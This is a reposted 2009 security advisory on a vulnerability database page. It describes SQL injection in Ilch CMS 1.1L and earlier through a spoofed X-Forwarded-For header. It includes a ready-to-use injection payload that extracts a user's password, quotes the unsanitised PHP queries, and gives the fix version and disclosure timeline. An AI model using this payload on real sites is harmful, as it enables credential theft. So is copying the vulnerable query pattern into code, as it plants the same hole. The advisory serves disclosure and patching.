Lucene search
K

Ilch CMS SQL Injection

🗓️ 06 Feb 2009 00:00:00Reported by GizmoreType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Ilch CMS SQL Injection vulnerability in guestbook and statistics with fix in version 1.1

Code
`Ilch CMS (from http://ilch.de) is vulnerable to sql-injection  
  
Prone to the vulnerabilty are the guestbook and the statistics.  
  
- Affected Versions: ilch 1.1L and below  
- Not vulnerable: ilch 1.1M  
  
- Exploit: Spoof your x-forwarded-for header to:  
  
127.0.0.1', (select `pass` from prefix_user WHERE `id` > 0   
ORDER BY `id` LIMIT 1)) /*  
  
Then create a guestbook entry.  
  
- Timeline:  
3.Feb.09: Vuln reported to ilch.de  
3.Feb.09: Got reply from ilch  
4.Feb.09: Version 1.1M is available which fixes the issue  
  
  
  
Here is a summary of the vulnerability:  
  
# in include/includes/func/statistics.php is missing user input   
sanitization:  
  
function getip() {  
if ($_SERVER["HTTP_X_FORWARDED_FOR"]) {  
return ($_SERVER["HTTP_X_FORWARDED_FOR"]);  
} else {  
return ($_SERVER["REMOTE_ADDR"]);  
}  
}  
  
# in include/contents/gbook.php getip() is used without validation  
  
db_query("INSERT INTO prefix_gbook   
(`name`,`mail`,`page`,`time`,`ip`,`txt`) VALUES ('".$name."', '".$mail."',   
'".$page."', '".time()."', '".getip()."', '".$txt."')");  
  
# There is also getip() used in includes/func/user.php, but its way harder   
to exploit:  
  
db_query("INSERT INTO prefix_online (sid,uptime,ipa) VALUES   
('".session_id()."',now(),'".getip()."')");  
  
  
  
Please credit the discovery to Gizmore from wechall.net :)  
  
Kind Regards  
Gizmore  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation